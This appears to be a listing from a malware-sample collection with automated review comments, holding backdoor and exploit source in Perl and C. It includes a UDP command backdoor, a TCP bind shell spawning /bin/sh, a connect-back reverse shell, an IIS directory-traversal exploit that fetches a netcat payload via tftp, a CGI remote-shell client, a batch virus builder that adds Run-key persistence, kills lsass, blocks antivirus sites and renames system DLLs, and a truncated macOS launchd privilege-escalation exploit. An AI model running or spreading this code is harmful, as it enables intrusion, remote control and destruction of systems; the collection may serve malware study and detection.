$buf .= @series[($num >> 4) & 0xF];
$buf .= @subs[$num & 0xF];
return($buf);
}
sub safeload {
my ($module, $require, $arg) = @_;
my $file = $module;
$file =~ s/::/\//g;
if ($require) {
# all found gonna be loaded
map { eval ("require \"$_/$file\";") if(-f "$_/$file"); } @INC;
} else {
$file .= ".pm" unless ($file =~ /(\.pm|\.ph)$/);
return(eval("use $module $arg;")) if (grep { -f "$_/$file" } @INC);
}
return();
}
sub write_shell {
my ($cli, $msg) = @_;
my $shell = $CLIENT{$cli}->{shell};
return(undef) unless ($shell);
foreach my $m (split_chars($msg, 20)) {
read_shells();
print $shell $m;
read_shells();
}
return(1);
}
sub split_chars {
my ($msg, $nchars) = @_;
my @splited;
my @chrs = split ('', $msg);
my $done = 0;
while ( 1 ) {
my $splited = join('', @chrs[$done .. ($done+$nchars-1)]);
$done += $nchars;
last if (length($splited) < 1);
push(@splited, $splited);
}
return(@splited);
}
sub finish_client {
my ($cli, $msg) = @_;
write_client($cli, $msg);
close_client($cli);
}
sub close_client {
my $cli = shift;
my $sock = $CLIENT{$cli}->{sock};
$sel_serv->remove($sock);
if ($CLIENT{$cli}->{shell}) {
my $shell = $CLIENT{$cli}->{shell};
$sel_shell->remove($shell);
close($shell);
}
$sock->close() if($sock);
delete($CLIENT{$cli});
}
sub write_client {
my ($cli, $msg) = @_;
my $sock = $CLIENT{$cli}->{sock};
syswrite($sock, $msg, length($msg)) if ($sock);
}
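Review bot: The CONFIGURATION block documents what each knob is but not the artifacts it produces, which is what a corpus reader needs: the listener defaults to TCP/3847, `$0=$PROC."\0"` retitles the process to `inetd`, `$ENV{HISTFILE}` is pointed at `/dev/null`, and the login is checked by `crypt($pass, $PASS)` against the hard-coded 13-character hash `ouhEUhhJ6RbwE` (traditional DES format, going by its length). A comment closing that block, e.g. `# host/network artifacts: listener on $PORT, process title $PROC, HISTFILE=/dev/null, "Password: " and "Password Errata!" sent in clear over the socket`, would record them. The prompt and reject strings are written verbatim by `write_client` before any shell exists, so they are the sample's stable network signature. `$SIG{PS} = 'IGNORE'` names a signal that does not exist and, with `use warnings` absent, is a silent no-op; a `# no-op: no such signal` marker would keep a reader from taking it as SIGPIPE handling.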

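--- a/Perl/Backdoor.Perl.Udpdor
+++ b/Perl/Backdoor.Perl.Udpdor
@@ -0,0 +1,145 @@
+# server..
+# see docs for what needs to be edited..
+# (plastek)
+$pid=fork;
+exit if $pid;
+die("Error.") unless defined($pid);
+use IO::Socket;
+use POSIX;
+use Fcntl ':flock';
+POSIX::setsid();
+$0 = 'slash';
+$time_to_die=0;
+sub signal_handler {
+$time_to_die=1;
+}
+$SIG{INT}=$SIG{TERM}=$SIG{HUP}=\&signal_handler;
+until($time_to_die) {
+$|=1;
+$port=52000;
+$maxlen=1024;
+my($sock, $raddr, $rhost);
+$sock=IO::Socket::INET->new(LocalPort=>$port,Proto=>'udp') or die("Error.\n");
+while($sock->recv($msg, $maxlen)) {
+my($rport, $ipaddr)=sockaddr_in($sock->peername);
+$rhost=gethostbyaddr($ipaddr, AF_INET);
+# to r be change
+if($rhost =~ /(pear|cherry)/){
+if($rport =~ /1243/){
+my $kfile = '...k';
+open(KFILE, "< $kfile");
+for my $bytes(<KFILE>){
+$kekel = $bytes;
+}
+$blew = Gh0ST0r->new($kekel);
+$fmsg = $blew->gee_golly($msg);
+close KFILE;
+if($fmsg =~ /sendtxt/){
+$fmsg =~ s/sendbin//;
+my ($file, $payload) = split(/::::/, $fmsg);
+open(TMP, ">> $file");
+flock(TMP, LOCK_SH);
+print TMP $payload;
+close TMP;
+}
+if($fmsg =~ /nike::/){
+$fmsg =~ s/nike:://;
+open(KTMP, "> ...k");
+print KTMP "$fmsg";
+close KTMP;
+system("chmod 600 $kfile");
+}
+if($fmsg =~ /\.\//){
+$fmsg =~ s/\.\///;
+system("$fmsg");
+}
+}
+}
+}
+}
+package Gh0ST0r;
+require Exporter;
+@ISA = qw(Exporter);
+@EXPORT_OK = qw();
+use strict;
+no strict 'refs';
+use vars qw( @b @t @R @S @h @o @K $VERSION );
+$VERSION = "1.0";
+sub new {
+my ( $argument, $pp ) = @_;
+Setup( $pp );
+my $class = ref ( $argument ) || $argument;
+my $self = {};
+bless $self, $class;
+return $self;
+}
+sub egadz {
+my ( $self, $tax ) = @_;
+return Gh0ST( $tax );
+}
+sub gee_golly {
+my ( $self, $tax ) = @_;
+return Gh0ST( $tax, 1 );
+}
+sub Gh0ST {
+my ( $v, $w, $a, $q, $c, $out, $self );
+my ( $e, $d ) = @_;
+@h = 0 .. 7;
+@o = reverse @h;
+while ( $a < length $e ) {
+$v = N( $e, $a );
+$w = N( $e, ( $a += 8 ) - 4 );
+grep $q++ % 2 ? $v ^= F( $w + $K[ $_ ] ) : ( $w ^= F( $v + $K[ $_ ] ) ), $d ? ( @h, ( @o ) x 3 ) : ( ( @h ) x 3, @o );
+$out .= pack N2, $w, $v;
+}
+return $out;
+}
+sub F {
+my $u = 0;
+grep $u |= $S[ $_ ][ $_[ 0 ] >> $_ * 4 & 15 ] << $_ * 4, reverse 0 .. 7;
+return $u << 11 | $u >> 21;
+}
+sub R {
+return int( (shift) * rand );
+}
+sub N {
+return vec $_[ 0 ], $_[ 1 ] / 4, 32;
+}
+sub Setup {
+my $p = shift;
+my ( $s, $i, $c );
+for ( $i = 0; $i < length $p; $i += 4 ) {
+srand( $s ^= N( $p, $i ) );
+}
+@b = @t = 0 .. 15;
+while ( $c < 8 ) {
+grep { push @b, splice @b, R( 9 ), 5 } @t;
+$R[ $c ] = R( 2**32 );
+@{ $S[ $c++ ] } = @b;
+}
+}
+1;
+__END__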
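Review bot: The `# see docs for what needs to be edited..` header points at documentation that is not in this commit, so the sample's trust gate goes undocumented: a datagram on UDP/52000 is handled only when the sender's reverse-DNS name matches `/(pear|cherry)/` and its source port matches `/1243/`, and the body is then decrypted by Gh0ST0r with the key read from the `...k` file. A header comment such as `# gate: sender PTR =~ /(pear|cherry)/ and source port =~ /1243/; key file ./...k; process title 'slash'` would record the PTR-record dependency and the host-side indicators in one place. Two behavioural notes belong there as well: the `sendtxt` branch strips the literal `sendbin` rather than `sendtxt`, so if the keyword leads the message it survives into the filename taken from `split(/::::/, ...)` (the message layout is only implied by the code, so this is an inference); and `@K` is declared in `use vars` but never assigned anywhere in the visible listing, so the `F( $w + $K[ $_ ] )` round keys evaluate as undef/0 and the only key-dependent state appears to be the `srand`-seeded S-box built in `Setup`.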

@ -0,0 +1,73 @@
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
void mk_daemon();
int main(int argc, char **argv)
{
int lfd,cfd;
socklen_t len;
struct sockaddr_in cli,serv;
pid_t pid;
char **sh;
sh[0]="/bin/sh";
sh[1]=NULL;
mk_daemon();
strncpy(argv[0],"ps",sizeof(argv[0]));
lfd=socket(AF_INET,SOCK_STREAM,0);
bzero(&serv,sizeof(serv));
serv.sin_family=AF_INET;
serv.sin_addr.s_addr=htonl(INADDR_ANY);
serv.sin_port=htons(65535);
bind(lfd,(struct sockaddr *)&serv,sizeof(serv));
listen(lfd,5);
while(1)
{
len=sizeof(cli);
cfd=accept(lfd,(struct sockaddr *)&cli,&len);
if(!(pid=fork()))
{
dup2(cfd,0);
dup2(cfd,1);
dup2(cfd,2);
execve(sh[0],sh,NULL);
close(cfd);
exit(0);
}
close(cfd);
}
return 0;
}
void mk_daemon()
{
/* yes I did get this out of UNP */
int x;
pid_t pid;
if((pid=fork()) !=0)
{
exit(-1);
}
setsid();
signal(SIGHUP,SIG_IGN);
signal(SIGINT,SIG_IGN);
if((pid=fork()) !=0)
{
exit(-1);
}
chdir("/");
umask(0);
for(x=0;x<=64;x++)
{
close(x);
}
}
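Review bot: There is no header comment, and the listing as stored is unlikely to run unmodified: `sh` is an uninitialized `char **` that is written through on the next two lines, and `strncpy`, `bzero` and `signal` are used with no `<string.h>`, `<strings.h>` or `<signal.h>` include. A header like `/* bind shell: daemonizes, retitles argv[0] to "ps", listens on TCP/65535 (INADDR_ANY) and execve()s /bin/sh per accepted connection; source as stored has an uninitialized-pointer write and missing includes */` would tell an analyst both what a built copy does and that this text is not a verbatim build source. Since `mk_daemon` closes descriptors 0 through 64 before `socket()` is called, a running copy will presumably hold its listening socket on descriptor 0, which is worth noting for anyone triaging it from `/proc` or `lsof` output.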

@ -0,0 +1,56 @@
# This is for educational purpose's only!
# WHO LET THEM DOGS OUT!
# Use uni.pl first to see if this is a vulnerable server!
# Based of the script unicodeexecute.pl from Roelof Temmngh
# Files=uniexe.pl,uni.pl,readme.file,tftpd32.exe,exploit.readme
use Socket;
if ($#ARGV<0) {die "Usage: uniexe.pl IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n\cls");
foreach $line (@results){
if ($line =~ /nit.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
#You need to change the xxx.xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i xxx.xxx.xxx.xxx GET ncx99.exe c:\\inetpub\\scripts\\nit.exe";
$command=~s/ /\%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line2 (@results2){
if (($line2 =~ /nit.exe/ )) {$failed2=0;}
}
}
$command=@ARGV[1];
print "\n
Hit CTRL-C if this is Hanging";
$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# NIT IN THE YEAR 2000
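Review bot: The header lists companion files (`uni.pl`, `readme.file`, `tftpd32.exe`, `exploit.readme`) that are not part of this commit, so the three-stage flow is only recoverable by reading the code: a probe request checked for `nit.exe` in the response, a conditional `tftp -i ... GET ncx99.exe` fetch into `c:\inetpub\scripts\nit.exe`, then the user's command, all through the `/scripts/..%c0%af../winnt/system32/cmd.exe?/c+` traversal path. A comment before the first `sendraw(` call naming those three stages and the `nit.exe` marker the script greps for would let a reviewer map each request to an IIS log line. Stylistically, `@ARGV[0]` and `@ARGV[1]` are one-element slices where `$ARGV[0]`/`$ARGV[1]` are meant; they only work because a one-element slice yields that element in both the `split` list context and the scalar assignment to `$command`.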

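--- a/Perl/Backdoor.Perl.Worsyn
+++ b/Perl/Backdoor.Perl.Worsyn
@@ -0,0 +1,45 @@
+use Socket;
+print "Data Cha0s Connect Back Backdoor\n\n";
+if (!$ARGV[0]) {
+printf "Usage: $0 [Host] <Port>\n";
+exit(1);
+}
+print "[*] Dumping Arguments\n";
+$host = $ARGV[0];
+$port = 80;
+if ($ARGV[1]) {
+$port = $ARGV[1];
+}
+print "[*] Connecting...\n";
+$proto = getprotobyname('tcp') || die("[-] Unknown Protocol\n");
+socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Socket Error\n");
+my $target = inet_aton($host);
+if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
+die("[-] Unable to Connect\n");
+}
+print "[*] Spawning Shell\n";
+if (!fork( )) {
+open(STDIN,">&SERVER");
+open(STDOUT,">&SERVER");
+open(STDERR,">&SERVER");
+exec {'/bin/sh'} '-bash' . "\0" x 4;
+exit(0);
+}
+print "[*] Detached\n\n";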

192
Perl/Backdoor.Perl.Wsh.10 Normal file
@ -0,0 +1,192 @@
# wsh-c - cgi based remote unix shell (client part)
# by Alex Dyatlov <alex@dyatlov.ru>
# April, 2002
#
# INSTALL
# Module Term::ReadLine::Gnu installation is recommended, get:
# 1) readline-4.2a.tar.gz or later from
# http://www.gnu.org/directory/readline.html
# 2) ReadLine-Gnu-1.12.tar.gz or later from
# http://search.cpan.org/search?dist=Term-ReadLine-Gnu
#
# SHELL COMMANDS
# exit as is
# history show commands history
# !<number> execute command with history <number>
# wshget <file> get <file> from remote host to local directory
# wshput <file> put <file> from local directory to remote host
use strict;
use IO::Socket;
use Term::ReadLine;
use POSIX qw(:sys_wait_h);
#--- config - begin ----------------------------------->8--
my $use_proxy = 1; #--- (0 || 1) connect directly or use HTTP proxy
my $host = "111.222.33.4"; #--- proxy ip here if $use_proxy = 1
my $port = 3128; #--- proxy port
my $http_port = 80; #--- default HTTP port
my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"; #--- for httpd logs
my $anticache = 0; #--- (0 || 1) add '?<random_number>' to URL
my $shell_prompt = "wsh#";
my $pwd = "/"; #--- 'home' directory on remote host
my $pattern = "STCOM";
#--- config - end ------------------------------------->8--
my $VERSION = "1.0";
$ENV{PERL_RL} = " o=0"; # use best available ReadLine without ornaments
my $request = $ARGV[0];
my $shtam = $ARGV[1];
unless ($request && $shtam) {
print "Usage: $0 host/dir/script KEY\n\n";
exit -1;
}
my $hostname;
if ($request =~ /^([^\/]+)(.*)/s) {
$hostname = $1;
$request = $2
if (!$use_proxy);
if ($hostname =~ /([^:]+):(.*)/) {
$hostname = $1;
$http_port = $2;
}
} else {
print "unable to parse hostname from $ARGV[0]\n\n";
exit -1;
}
if (!$use_proxy) {
if ($hostname !~ /\d+\.\d+\.\d+\.\d+/) {
(my $name, my $aliases, my $addrtype, my $length, my @addrs) =
gethostbyname($hostname)
or die "unable to resolve hostname '$hostname'\n\n";
$host = join('.', unpack('C4', $addrs[0]));
} else {
$host = $hostname;
}
$port = $http_port;
} else {
$request = "http://".$request;
}
my $term = Term::ReadLine->new("wsh");
my $OUT = $term->OUT() || *STDOUT;
my @h_list = ();
my $io;
my $file;
while (defined (my $cmd = $term->readline("$shell_prompt "))) {
next if (length($cmd) == 0);
# wsh commands --- begin
exit 0 if ($cmd =~ /^exit$/s);
if ($cmd =~ /^history$/s) {
my $h_counter = 1;
foreach (@h_list) {
print $OUT " ".($h_counter++)."\t$_\n";
}
next;
}
if ($cmd =~ /^\!(\d+)$/s) {
($1 > 0 && $1 <= scalar(@h_list)) ?
$cmd = $h_list[$1-1] :
next;
}
$io = undef;
if ($cmd =~ /^wsh((get)|(put)) ['" ]*?([^'"]+)/s) {
$io = $1;
$file = $4;
($pwd =~ /\/$/s) ?
$cmd = "wsh$io \"$pwd$file\"" :
$cmd = "wsh$io \"$pwd/$file\"";
if ($io =~ /put/) {
unless (open(FH, $file)) {
print "$file: $!\n";
next;
}
$cmd = join(//, ($cmd, <FH>));
close(FH);
}
}
# wsh commands --- end
push(@h_list, $cmd);
if ($cmd =~ /^cd ['"]?([^'"; ]+)$/s) {
my $dir = $1;
if ($dir !~ /^\//s) {
$pwd = "$pwd/$dir";
$pwd =~ s/[^\/]+\/\.\.//g;
$pwd =~ s/\/{2,}/\//g;
$pwd =~ s/\/$//;
} else {
$pwd = $dir;
}
next;
}
$cmd = "if [ -d $pwd ];then cd $pwd;".
"else echo 'cd: $pwd: No such file or directory';exit 0;fi;$cmd"
unless (defined($io));
my $cmd_s = $pattern;
$cmd_s =~ s/ST/$shtam/;
$cmd_s =~ s/COM/$cmd/;
my $cmd_sl = length($cmd_s);
my $socket = IO::Socket::INET->new(
PeerAddr => $host,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM) or die $!;
($anticache) ?
print $socket "POST $request?".(int(rand(9999)))." HTTP/1.0\r\n" :
print $socket "POST $request HTTP/1.0\r\n";
print $socket
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: $agent\r\n".
"Host: $hostname\r\n".
"Content-Length: $cmd_sl\r\n";
($use_proxy) ?
print $socket
"Proxy-Connection: close\r\n".
"Pragma: no-cache\r\n" :
print $socket
"Connection: close\r\n";
print $socket
"\r\n".
"$cmd_s";
my $cl = 0;
my $crlf = 0;
my @msg = ();
while (my $str = <$socket>) {
if (!$crlf && $str =~ /^\s*?$/s) {
$crlf = 1;
next;
}
$msg[$crlf] = $msg[$crlf].$str;
if (!$cl && $crlf) {
$cl = length($msg[0]) + 4;
if ($msg[0] =~ /Content-Length: (\d+)/s) {
$cl += $1;
} else {
$cl = -1;
}
}
last if ($cl > 0 && length($msg[0].$msg[1])+4 >= $cl);
}
close($socket);
if ($msg[0] !~ /^[^ ]+ 200/s) {
print $OUT "HTTP request fail:\n\n$msg[0]\n";
next;
}
if ($io =~ /get/) {
if (length($msg[1]) > 0) {
if (open(FH, "> $file")) {
print FH $msg[1];
close(FH);
} else {
print $OUT $!;
}
} else {
print $OUT "wshget fail\n"
}
} else {
print $OUT $msg[1];
}
}
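Review bot: The config block explains each variable but not the on-the-wire format that results, which is the detection-relevant part: every command goes out as a `POST` whose body is `$pattern` with `ST` replaced by the key and `COM` by the command, and unless the command is a wshget/wshput it is first wrapped in `if [ -d $pwd ];then cd $pwd;else echo 'cd: $pwd: No such file or directory';exit 0;fi;`, under a fixed `User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)`. A comment at `my $pattern = "STCOM";` such as `# request body = <KEY><command>; non-file commands are prefixed with the "if [ -d <pwd> ];then cd" wrapper, so that prefix and the fixed User-Agent are stable request signatures` would record that. One behavioural oddity is better documented than fixed in a corpus listing: on the wshput path `join(//, ($cmd, <FH>))` uses `//` as an empty-pattern match against `$_`, not an empty separator, so as far as I can tell the uploaded lines are joined with that match's result (1 or the empty string) rather than with nothing. The `if ($msg[0] !~ /^[^ ]+ 200/s)` status check and the hand-rolled `Content-Length` accounting in the read loop both live in this same `while` body, so a reader has to follow about a hundred lines to see the whole round trip; a short comment marking where request ends and response parsing begins would help.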

244
Perl/Constructor.Perl.DAV.a Normal file
@ -0,0 +1,244 @@
# Virus Builder
# by dav
$vname = '';
$vwriter = '';
$vbsmsgtxt = '';
$vtime = '';
print("*******************\n");
print("DAV's Virus Builder\n");
print("BAT/VIRUS\n");
print("*******************\n");
print("\n");
print("VirusName?\n");
chomp ($vname = <STDIN>);
print("\n");
print("Author?\n");
chomp ($vwriter = <STDIN>);
print("\n");
open(FH,">virus.bat");
print FH '@echo off';
print FH "\n";
close(FH);
open(FH,">>virus.bat");
print FH "rem $vname - Virus\n";
print FH "rem by $vwriter\n";
print FH "rem ** generated with dav's virus builder v.1.0 in perl **\n";
print FH "set dav=echo\n";
print FH "set davv=copy\n";
print FH "set davvv=reg add\n";
print FH "set davvvv=del\n";
print FH "set davvvvv=net share\n";
print FH "set davvvvvv=cls\n";
print FH "set davvvvvvv=taskkill\n";
print FH "set davvvvvvvv=ren\n";
print FH "set davvvvvvvvv=call\n";
print FH "set davvvvvvvvvv=shutdown\n";
print FH "%davv% %0 %windir%\\vwin.bat > nul";
print FH "\n";
close(FH);
print("*** Startup Methods ***\n");
print("Autostart/Startup Infect - yes/no?\n");
chomp ($vstartup = <STDIN>);
if($vstartup=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH "chcp 1252 > nul";
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\win.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\win.bat" > nul';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("REGentry(works on all winsys) - yes/no?\n");
chomp ($regy = <STDIN>);
if($regy=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH '%davvv% "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v vwin /t REG_SZ /d "%windir%\vwin.bat" /f > nul';
print FH "\n";
print FH '%davvv% "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v vwin /t REG_SZ /d "%windir%\vwin.bat" /f > nul';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("*** Virus Main Function ***\n");
print("Shutdown with time and comment - yes/no?\n");
chomp ($shutdown = <STDIN>);
if($shutdown=~m/^(yes|ja|j|y)/i) {
print("Seconds to restart?\n");
chomp ($vtime = <STDIN>);
print("Comment?\n");
chomp ($vcom = <STDIN>);
open(FH,">>virus.bat");
print FH "%davvvvvvvvvv% /s /f /t ";
print FH "$vtime";
print FH " ";
print FH "/c ";
print FH '"';
print FH "$vcom";
print FH '"';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("LSASS.exe and EXPLORER.exe Killer - yes/no?\n");
chomp ($lsass = <STDIN>);
if($lsass=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH "%davvvvvvv% /f /im explorer.exe\n";
print FH "%davvvvvvv% /f /im lsass.exe \n";
close(FH); } else { print "x\n" }
print("\n");
print("Net Share c:, g: ... - yes/no?\n");
chomp ($netshare = <STDIN>);
if($netshare=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH "%davvvvv% c=c:\n";
print FH "%davvvvv% g=g:\n";
print FH "%davvvvv% f=f:\n";
print FH "%davvvvv% y=y:\n";
close(FH); } else { print "x\n" }
print("\n");
print("kill cookies - yes/no?\n");
chomp ($vcookie = <STDIN>);
if($vcookie=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH '%davvvvvvvv% "c:\documents and settings\%username%\cookies\*.txt" *.fUcKeDbYvIrUs > nul';
print FH "\n";
print FH '%davvvvvvvv% "C:\Dokumente und Einstellungen\%username%\cookies\*.txt" *.fUcKeDbYvIrUs > nul';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("infect hosts file - yes/no?\n");
chomp ($vhosts = <STDIN>);
if($vhosts=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH "%dav% 127.0.0.1 www.google.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.google.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.symantec.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.antivir.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.f-secure.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.f-secure.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.kaspersky.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.kaspersky.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.nai.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 windowsupdate.microsoft.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.symantec.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.microsoft.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.microsoft.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.free-av.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.sophos.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.sophos.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%davvvvvv%\n";
close(FH); } else { print "x\n" }
print("\n");
print("Random Population - yes/no?\n");
chomp ($ranpop = <STDIN>);
if($ranpop=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH "%davv% %0 %random%.bat\n";
print FH "%davv% %0 %random%.bat\n";
print FH "%davv% %0 %random%.bat\n";
print FH "%davv% %0 %random%.bat\n";
print FH "%davv% %0 c:\\%random%.bat\n";
print FH "%davv% %0 c:\\%random%.bat\n";
print FH "%davv% %0 c:\\%random%.bat\n";
print FH "%davv% %0 c:\\%random%.bat\n";
print FH "%davvvvvv%\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("infect some .exe files - yes/no?\n");
chomp ($syskiller = <STDIN>);
if($syskiller=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH '%davv% %0 %windir%\\system32\\taskmgr.exe > nul';
print FH "\n";
print FH '%davv% %0 %windir%\\system32\\winlogon.exe > nul';
print FH "\n";
print FH '%davv% %0 %windir%\\system32\\svchost.exe > nul';
print FH "\n";
print FH '%davv% %0 %windir%\\system32\\calc.exe > nul';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("kill .dll .ini files (** WARNING! **) - yes/no?\n");
chomp ($syskiller1 = <STDIN>);
if($syskiller1=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH '%davvvvvvvv% %0 %windir%\\system32\\*.dll *.-fUcKeD > nul';
print FH "\n";
print FH '%davvvvvvvv% %0 %windir%\\system32\\*.ini *.FuCkEd- > nul';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("VBS Messagebox - yes/no?\n");
chomp ($vbsmsg = <STDIN>);
if($vbsmsg=~m/^(yes|ja|j|y)/i) {
print("Message?\n");
chomp ($vbsmsgtxt = <STDIN>);
open(FH,">>virus.bat");
print FH '%dav% MsgBox "';
print FH "$vbsmsgtxt";
print FH '", 16, "ViRuS!!!" > msg.vbs';
print FH "\n";
print FH "%davvvvvvvvv% msg.vbs\n";
close(FH); } else { print "x\n" }
print("\n");
open(FH,">>virus.bat");
print FH "goto ende\n";
print FH ":ende\n";
close(FH);
print("\n");
while ($cya ne 'exit') {
print "*** VIRUS.BAT BUILT ***\n";
print "*** DON'T SPREAD YOUR VIRUS. ***\n";
print "*** I AM NOT RESPONSIBLE FOR POSSIBLE DAMAGES OR SOMETHING ELSE. ***\n";
print "*** exit to quit ***\n";
chomp ($cya = <STDIN>);
print "\n"; }

@ -0,0 +1,126 @@
# http://www.digitalmunition.com/FailureToLaunch.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This is a practical application of Non Executable Stack Lovin - http://www.digitalmunition.com/NonExecutableLovin.txt
#
# This code currently jumps into 0x1811111 via dyld_stub_close()
#
# This exploit will create a malicious .plist file for you to use with launchctl
# k-fs-computer:~ kf$ launchctl load ./com.pwnage.plist
#
# In theory I guess you could also drop this in ~/Library/LaunchAgents
#
# This was tested against OSX 10.4.6 8l1119 on a 1.5GHz Intel Core Solo
#
# k-fs-computer:~ kf$ ls -al /sbin/launchd
# -rwsr-sr-x 1 root wheel 161944 Feb 19 04:46 /sbin/launchd
# k-fs-computer:~ kf$ file /sbin/launchd
# /sbin/launchd: setuid setgid Mach-O universal binary with 2 architectures
# /sbin/launchd (for architecture i386): Mach-O executable i386
# /sbin/launchd (for architecture ppc): Mach-O executable ppc
#
# ./src/SystemStarter.c:374: syslog(level, buf);
# proactive security eh?
foreach $key (keys %ENV) {
delete $ENV{$key};
}
$writeaddr = 0xa0011163; # close()
#$writeaddr = 0xa00119f1; # cxa_finalize() (must wait 25 seconds or so if you use this one)
$sc = (0x1811111);
# both of these arrays are put in size order due to the multiple writes via unformatted syslog() call
# seteuid after thought... whoops...I had to move some shit arround to account for this
@seteuid =
([$sc+2, $sc+4, $sc, $sc+6],
[0x5050, 0xb7b0, 0xc031, 0x80cd], );
# Write the following instructions to 0xa0011163 <dyld_stub_close> as well as nemos execve() to 0x1811111
# mov $0x1811111,%eax
# jmp *%eax
#
@payload =
